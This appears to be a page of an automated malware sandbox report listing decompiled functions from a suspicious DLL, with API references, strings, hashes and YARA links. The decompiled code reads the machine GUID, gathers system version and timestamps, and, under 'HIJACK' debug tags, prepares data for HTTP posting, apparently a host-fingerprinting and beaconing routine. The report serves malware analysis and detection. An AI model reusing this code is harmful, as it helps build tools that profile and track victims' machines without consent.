                                                                                                                                                                  • Instruction Fuzzy Hash: C61186B6C00208ABEB14EBA0DC56FDD7778EB14750F4441A4F619A61C5EB787748CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001F9F0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E1001F9F0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v275;
				char _v276;
				void* __ebp;
				void* _t20;
				void* _t37;

				_t37 = __eflags;
				_t28 = __edi;
				_v276 = 0;
				E1000CF80(__edi,  &_v275, 0, 0x103);
				_v12 = 0x104;
				E1001A350( &_v276,  &_v12); // executed
				E1000CDB3( &_v276,  &_v276, 0x104, "hijack");
				_v8 = E1001A4E0(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
				_t20 = E1000CCA3(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
				_t38 = _v8;
				if(_v8 != 0) {
					_push(_v8);
					return E1000CA40(__ebx, _t28, __esi, _t38);
				}
				return _t20;
			}










                                                                                                                                                                  0x1001f9f0
                                                                                                                                                                  0x1001f9f0
                                                                                                                                                                  0x1001f9f9
                                                                                                                                                                  0x1001fa0e
                                                                                                                                                                  0x1001fa16
                                                                                                                                                                  0x1001fa28
                                                                                                                                                                  0x1001fa41
                                                                                                                                                                  0x1001fa58
                                                                                                                                                                  0x1001fa68
                                                                                                                                                                  0x1001fa70
                                                                                                                                                                  0x1001fa74
                                                                                                                                                                  0x1001fa79
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001fa7f
                                                                                                                                                                  0x1001fa85

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FA0E
                                                                                                                                                                    • Part of subcall function 1001A350: RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A379
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FA41
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
                                                                                                                                                                    • Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FA68
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                                  • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                                  • API String ID: 3138967372-3622423033
                                                                                                                                                                  • Opcode ID: 5f933ddf6dabdaae646f14058590104521e6e07e27c6c3256ded00124ca53b5d
                                                                                                                                                                  • Instruction ID: 9d0dca558a4647b1c94e9ab51dbd61ee89e2acb8972101442078f4140e755168
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f933ddf6dabdaae646f14058590104521e6e07e27c6c3256ded00124ca53b5d
                                                                                                                                                                  • Instruction Fuzzy Hash: 8F0152F9C0020CA7DB15D7A0EC46FE97778AB54304F0404A9A61856141E7B5AB88C792
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A350, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A350(char* _a4, int* _a8) {
				void* _v8;
				int* _v12;
				long _t11;
				long _t13;

				_v12 = 0;
				_v8 = 0;
				_t11 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8); // executed
				if(_t11 == 0) {
					_t13 = RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8); // executed
					if(_t13 == 0) {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					return _v12;
				}
				return 0;
			}







                                                                                                                                                                  0x1001a356
                                                                                                                                                                  0x1001a35d
                                                                                                                                                                  0x1001a379
                                                                                                                                                                  0x1001a381
                                                                                                                                                                  0x1001a39c
                                                                                                                                                                  0x1001a3a4
                                                                                                                                                                  0x1001a3aa
                                                                                                                                                                  0x1001a3aa
                                                                                                                                                                  0x1001a3b5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001a3bb
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A379
                                                                                                                                                                  • RegQueryValueExA.KERNELBASE(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A39C
                                                                                                                                                                  • RegCloseKey.KERNELBASE(00000000), ref: 1001A3B5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                  • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                                  • API String ID: 3677997916-880526231
                                                                                                                                                                  • Opcode ID: 47a5e7846db4febb3ca94b54af4193357214023853d4f51c5508a224df730e19
                                                                                                                                                                  • Instruction ID: 036869a64e7b96092babc19efb2470d9694155ef05369fbbd3590e376cbd9c8c
                                                                                                                                                                  • Opcode Fuzzy Hash: 47a5e7846db4febb3ca94b54af4193357214023853d4f51c5508a224df730e19
                                                                                                                                                                  • Instruction Fuzzy Hash: 99F01275600208FBEB10DFA0DC85F9D77B9EB08700F604148FA14AB280DB75DB81DB65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001F500, Relevance: 7.6, APIs: 5, Instructions: 65registrytimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E1001F500(void* _a4, char* _a8) {
				char* _v8;
				struct _FILETIME _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				char* _v40;
				char* _v44;
				struct _FILETIME _v52;
				long _t27;
				char* _t43;

				_v44 = 0;
				_v40 = 0;
				_v16 = 0;
				_t27 = RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16); // executed
				if(_t27 == 0) {
					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						_v32.wYear = 0x7b2;
						_v32.wMonth = 1;
						_v32.wDay = 1;
						_v32.wHour = 0;
						_v32.wMinute = 0;
						_v32.wSecond = 0;
						_v32.wMilliseconds = 0;
						SystemTimeToFileTime( &_v32,  &_v52);
						_t43 = _v8;
						asm("sbb edx, [ebp-0x2c]");
						_v44 = E1000F2F0(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
						_v40 = _t43;
					}
					RegCloseKey(_v16);
				}
				return _v44;
			}












                                                                                                                                                                  0x1001f506
                                                                                                                                                                  0x1001f50d
                                                                                                                                                                  0x1001f514
                                                                                                                                                                  0x1001f52e
                                                                                                                                                                  0x1001f536
                                                                                                                                                                  0x1001f560
                                                                                                                                                                  0x1001f562
                                                                                                                                                                  0x1001f568
                                                                                                                                                                  0x1001f56e
                                                                                                                                                                  0x1001f574
                                                                                                                                                                  0x1001f57a
                                                                                                                                                                  0x1001f580
                                                                                                                                                                  0x1001f586
                                                                                                                                                                  0x1001f594
                                                                                                                                                                  0x1001f5a0
                                                                                                                                                                  0x1001f5a3
                                                                                                                                                                  0x1001f5b4
                                                                                                                                                                  0x1001f5b7
                                                                                                                                                                  0x1001f5b7
                                                                                                                                                                  0x1001f5be
                                                                                                                                                                  0x1001f5be
                                                                                                                                                                  0x1001f5cd

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000101,00000000), ref: 1001F52E
                                                                                                                                                                  • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F558
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F594
                                                                                                                                                                  • __aulldiv.LIBCMT ref: 1001F5AF
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 1001F5BE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3147484438-0
                                                                                                                                                                  • Opcode ID: b7fd3d01d5ea90349a3a8d64e1f3cb3a0cb48ce308f43978e438b8e68c732dd2
                                                                                                                                                                  • Instruction ID: f30bdbee4ac12bde428f6f044f578bd3b240634cd6c104924fe674acfb2d543b
                                                                                                                                                                  • Opcode Fuzzy Hash: b7fd3d01d5ea90349a3a8d64e1f3cb3a0cb48ce308f43978e438b8e68c732dd2
                                                                                                                                                                  • Instruction Fuzzy Hash: 87210D75D10208ABEB00CFD4C898FEEB7B9FF48704F109148EA14BB290D7759A49CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001F430, Relevance: 7.6, APIs: 5, Instructions: 61timefileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E1001F430(char* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				struct _FILETIME _v60;
				void* _v64;
				int _t28;
				struct _SECURITY_ATTRIBUTES* _t44;

				_v28 = 0;
				_v24 = 0;
				_t28 = PathFileExistsA(_a4); // executed
				if(_t28 != 0) {
					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
						_v20.wYear = 0x7b2;
						_v20.wMonth = 1;
						_v20.wDay = 1;
						_v20.wHour = 0;
						_v20.wMinute = 0;
						_v20.wSecond = 0;
						_v20.wMilliseconds = 0;
						SystemTimeToFileTime( &_v20,  &_v60);
						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
						asm("sbb eax, [ebp-0x34]");
						_v28 = E1000F2F0(_t44, _v36.dwHighDateTime, 0x2710, 0);
						_v24 = _t44;
					}
				}
				return _v28;
			}













                                                                                                                                                                  0x1001f436
                                                                                                                                                                  0x1001f43d
                                                                                                                                                                  0x1001f448
                                                                                                                                                                  0x1001f450
                                                                                                                                                                  0x1001f472
                                                                                                                                                                  0x1001f479
                                                                                                                                                                  0x1001f495
                                                                                                                                                                  0x1001f49b
                                                                                                                                                                  0x1001f4a1
                                                                                                                                                                  0x1001f4a7
                                                                                                                                                                  0x1001f4ad
                                                                                                                                                                  0x1001f4b3
                                                                                                                                                                  0x1001f4b9
                                                                                                                                                                  0x1001f4c7
                                                                                                                                                                  0x1001f4d0
                                                                                                                                                                  0x1001f4d6
                                                                                                                                                                  0x1001f4e7
                                                                                                                                                                  0x1001f4ea
                                                                                                                                                                  0x1001f4ea
                                                                                                                                                                  0x1001f479
                                                                                                                                                                  0x1001f4f6

                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFileExistsA.KERNELBASE(?), ref: 1001F448
                                                                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F46C
                                                                                                                                                                  • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F48B
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F4C7
                                                                                                                                                                  • __aulldiv.LIBCMT ref: 1001F4E2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3038978132-0
                                                                                                                                                                  • Opcode ID: c1a897aad6c05bd8ab7d9b163dd1f078ef973958e7b535aac97c866858d62821
                                                                                                                                                                  • Instruction ID: 282c7306dc6b684cc064bb2559bb565ca804bda22c30e035a61ca1407b16c130
                                                                                                                                                                  • Opcode Fuzzy Hash: c1a897aad6c05bd8ab7d9b163dd1f078ef973958e7b535aac97c866858d62821
                                                                                                                                                                  • Instruction Fuzzy Hash: 4621EA75910208ABEB10DFD4D895FEEB7B8FF04704F108208E505BB290DB75A685CB95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10022DFB, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 118COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E10022DFB(void* __ebx, void* __edi, void* __esi) {
				void* _t72;
				void* _t73;
				void* _t76;
				void* _t110;
				void* _t112;

				L0:
				while(1) {
					L0:
					_t109 = __esi;
					_t108 = __edi;
					_t77 = __ebx;
					 *((intOrPtr*)(_t110 - 0x2c)) =  *((intOrPtr*)(_t110 - 0x2c)) + 1;
					L1:
					_t118 =  *((intOrPtr*)(_t110 - 0x2c)) - 6;
					if( *((intOrPtr*)(_t110 - 0x2c)) <= 6) {
						L2:
						E100011C0(_t110 - 0x80, 0x10025cba);
						 *((intOrPtr*)(_t110 - 0xe8)) = E10022710(__ebx, __edi, __esi, _t118, _t110 - 0xbc,  *((intOrPtr*)(_t110 - 0x2c)));
						 *((intOrPtr*)(_t110 - 0xec)) =  *((intOrPtr*)(_t110 - 0xe8));
						 *((char*)(_t110 - 4)) = 5;
						E10001A70(_t110 - 0x80,  *((intOrPtr*)(_t110 - 0xec)));
						 *((char*)(_t110 - 4)) = 4;
						E100011A0(_t110 - 0xbc);
						 *((intOrPtr*)(_t110 - 0xf0)) = E10001160(_t110 - 0xd8, _t118,  *((intOrPtr*)(_t110 + 0xc)));
						 *((intOrPtr*)(_t110 - 0xf4)) =  *((intOrPtr*)(_t110 - 0xf0));
						 *((char*)(_t110 - 4)) = 6;
						E10001A90(_t110 - 0x80,  *((intOrPtr*)(_t110 - 0xf4)));
						 *((char*)(_t110 - 4)) = 4;
						E100011A0(_t110 - 0xd8);
						_push(E100011E0(_t110 - 0x80));
						_push(0x61);
						_push("post_info");
						E1001F230(__edi, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp")); // executed
						E100011C0(_t110 - 0x28, 0x10025cbb);
						E100011C0(_t110 - 0x48, 0x10025cce);
						_t72 = E10001200(_t110 - 0x64);
						_t73 = E100011E0(_t110 - 0x64);
						E10021C30(__ebx, __edi, __esi, _t118, 0, 0, 0, E100011E0(_t110 - 0x80), 2, 1, 0, _t73, _t72, 0, 0, 0, 0, 0, 0, _t110 - 0x28, _t110 - 0x48); // executed
						_t112 = _t112 + 0x60;
						_t76 = E10001200(_t110 - 0x28);
						_t119 = _t76;
						if(_t76 == 0) {
							L4:
							continue;
						}
					}
					L5:
					_push( *((intOrPtr*)(_t110 - 0x84)));
					E1000CA40(_t77, _t108, _t109, _t119);
					E10001110( *((intOrPtr*)(_t110 + 8)), _t119, _t110 - 0x48);
					 *(_t110 - 0xdc) =  *(_t110 - 0xdc) | 0x00000001;
					 *((char*)(_t110 - 4)) = 3;
					E100011A0(_t110 - 0x48);
					 *((char*)(_t110 - 4)) = 1;
					E100011A0(_t110 - 0x28);
					 *((char*)(_t110 - 4)) = 0;
					E100011A0(_t110 - 0x64);
					 *((intOrPtr*)(_t110 - 4)) = 0xffffffff;
					E100011A0(_t110 - 0x80);
					 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
					return  *((intOrPtr*)(_t110 + 8));
					L6:
				}
			}








                                                                                                                                                                  0x10022dfb
                                                                                                                                                                  0x10022dfb
                                                                                                                                                                  0x10022dfb
                                                                                                                                                                  0x10022dfb
                                                                                                                                                                  0x10022dfb
                                                                                                                                                                  0x10022dfb
                                                                                                                                                                  0x10022e01
                                                                                                                                                                  0x10022e04
                                                                                                                                                                  0x10022e04
                                                                                                                                                                  0x10022e08
                                                                                                                                                                  0x10022e0e
                                                                                                                                                                  0x10022e16
                                                                                                                                                                  0x10022e2e
                                                                                                                                                                  0x10022e3a
                                                                                                                                                                  0x10022e40
                                                                                                                                                                  0x10022e4e
                                                                                                                                                                  0x10022e53
                                                                                                                                                                  0x10022e5d
                                                                                                                                                                  0x10022e71
                                                                                                                                                                  0x10022e7d
                                                                                                                                                                  0x10022e83
                                                                                                                                                                  0x10022e91
                                                                                                                                                                  0x10022e96
                                                                                                                                                                  0x10022ea0
                                                                                                                                                                  0x10022ead
                                                                                                                                                                  0x10022eae
                                                                                                                                                                  0x10022eb0
                                                                                                                                                                  0x10022ec6
                                                                                                                                                                  0x10022ed6
                                                                                                                                                                  0x10022ee3
                                                                                                                                                                  0x10022eff
                                                                                                                                                                  0x10022f08
                                                                                                                                                                  0x10022f23
                                                                                                                                                                  0x10022f28
                                                                                                                                                                  0x10022f2e
                                                                                                                                                                  0x10022f33
                                                                                                                                                                  0x10022f35
                                                                                                                                                                  0x10022f39
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022f39
                                                                                                                                                                  0x10022f35
                                                                                                                                                                  0x10022f3e
                                                                                                                                                                  0x10022f44
                                                                                                                                                                  0x10022f45
                                                                                                                                                                  0x10022f54
                                                                                                                                                                  0x10022f62
                                                                                                                                                                  0x10022f68
                                                                                                                                                                  0x10022f6f
                                                                                                                                                                  0x10022f74
                                                                                                                                                                  0x10022f7b
                                                                                                                                                                  0x10022f80
                                                                                                                                                                  0x10022f87
                                                                                                                                                                  0x10022f8c
                                                                                                                                                                  0x10022f96
                                                                                                                                                                  0x10022fa1
                                                                                                                                                                  0x10022fab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022fab

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 10022710: _memset.LIBCMT ref: 1002276B
                                                                                                                                                                    • Part of subcall function 10022710: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C
                                                                                                                                                                  • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000061,00000000,?,?,?,info=,10025CA2), ref: 10022EBA
                                                                                                                                                                    • Part of subcall function 1001F230: _memset.LIBCMT ref: 1001F25B
                                                                                                                                                                    • Part of subcall function 1001F230: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Http_memset$DebugFileFindLocalNameOpenOptionOutputPathStringTime
                                                                                                                                                                  • String ID: .\post_info.cpp$[HIJACK][%s][%s][%d]: url = %s$post_info
                                                                                                                                                                  • API String ID: 4078257140-115957201
                                                                                                                                                                  • Opcode ID: 2e5c64d8afcfb9ddf15bb862174beeccd90e78952ebceb7d9c30a92996c6efd8
                                                                                                                                                                  • Instruction ID: 4cd3f4f778056951b5cfd2b5c12ca28e1b0ee278467a54424c11d59ecdb1d103
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e5c64d8afcfb9ddf15bb862174beeccd90e78952ebceb7d9c30a92996c6efd8
                                                                                                                                                                  • Instruction Fuzzy Hash: C1413D75D11248ABEB18DB94CC92FEDBB74EF18384F5080A8F60A77195EB302A45CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A7A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                  			E1001A7A0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v279;
				char _v280;
				intOrPtr _v284;
				char _v312;
				signed int _v316;
				void* __ebp;
				void* _t27;
				intOrPtr _t52;
				void* _t55;

				_t51 = __esi;
				_t50 = __edi;
				_t37 = __ebx;
				_push(0xffffffff);
				_push(E10023171);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_v316 = 0;
				E10001160( &_v312, __eflags, 0x10025c8f);
				_v8 = 0;
				_v280 = 0;
				E1000CF80(__edi,  &_v279, 0, 0x103);
				E1001DC60(__ebx, _t50, __esi,  &_v280); // executed
				_t46 =  &_v280;
				_t27 = E1000CAD0( &_v280);
				_t55 = _t52 - 0x12c + 0x10;
				_t59 = _t27;
				if(_t27 == 0) {
					E1000D903( &_v280,  &_v280, 0x104, "unknown err");
					_t55 = _t55 + 0xc;
				}
				_v284 = E1001A4E0(_t37, _t46, _t50, _t51, _t59,  &_v280);
				E100011C0( &_v312, _v284);
				_push(_v284);
				E1000CA40(_t37, _t50, _t51, _t59);
				E10001110(_a4, _t59,  &_v312);
				_v316 = _v316 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v312);
				 *[fs:0x0] = _v16;
				return _a4;
			}














                                                                                                                                                                  0x1001a7a0
                                                                                                                                                                  0x1001a7a0
                                                                                                                                                                  0x1001a7a0
                                                                                                                                                                  0x1001a7a3
                                                                                                                                                                  0x1001a7a5
                                                                                                                                                                  0x1001a7b0
                                                                                                                                                                  0x1001a7b1
                                                                                                                                                                  0x1001a7be
                                                                                                                                                                  0x1001a7d3
                                                                                                                                                                  0x1001a7d8
                                                                                                                                                                  0x1001a7df
                                                                                                                                                                  0x1001a7f4
                                                                                                                                                                  0x1001a803
                                                                                                                                                                  0x1001a808
                                                                                                                                                                  0x1001a80f
                                                                                                                                                                  0x1001a814
                                                                                                                                                                  0x1001a817
                                                                                                                                                                  0x1001a819
                                                                                                                                                                  0x1001a82c
                                                                                                                                                                  0x1001a831
                                                                                                                                                                  0x1001a831
                                                                                                                                                                  0x1001a843
                                                                                                                                                                  0x1001a856
                                                                                                                                                                  0x1001a861
                                                                                                                                                                  0x1001a862
                                                                                                                                                                  0x1001a874
                                                                                                                                                                  0x1001a882
                                                                                                                                                                  0x1001a888
                                                                                                                                                                  0x1001a895
                                                                                                                                                                  0x1001a8a0
                                                                                                                                                                  0x1001a8aa

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001A7F4
                                                                                                                                                                    • Part of subcall function 1001DC60: _memset.LIBCMT ref: 1001DC88
                                                                                                                                                                    • Part of subcall function 1001DC60: _memset.LIBCMT ref: 1001DCA5
                                                                                                                                                                    • Part of subcall function 1001DC60: _memset.LIBCMT ref: 1001DCBB
                                                                                                                                                                    • Part of subcall function 1001DC60: GetVersionExW.KERNEL32(00000114), ref: 1001DCD4
                                                                                                                                                                    • Part of subcall function 1001DC60: _strcpy_s.LIBCMT ref: 1001DE09
                                                                                                                                                                  • _strlen.LIBCMT ref: 1001A80F
                                                                                                                                                                  • _strcpy_s.LIBCMT ref: 1001A82C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strcpy_s$Version_strlen
                                                                                                                                                                  • String ID: unknown err
                                                                                                                                                                  • API String ID: 3541540748-813478822
                                                                                                                                                                  • Opcode ID: efac7168300570dca757fc9347812aa854d67acda7d2ffe497c1877d970e4793
                                                                                                                                                                  • Instruction ID: 3aebd5af5d9b05859a12e4e17c573b0f64c0ee580e65f946a6305cb29b00d5b6
                                                                                                                                                                  • Opcode Fuzzy Hash: efac7168300570dca757fc9347812aa854d67acda7d2ffe497c1877d970e4793
                                                                                                                                                                  • Instruction Fuzzy Hash: A6217CB5C0021CABDB28DB64DD82BD9B774EB04750F4041E8B609A7285EB74BB84CF92
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00427D8B, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 156COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
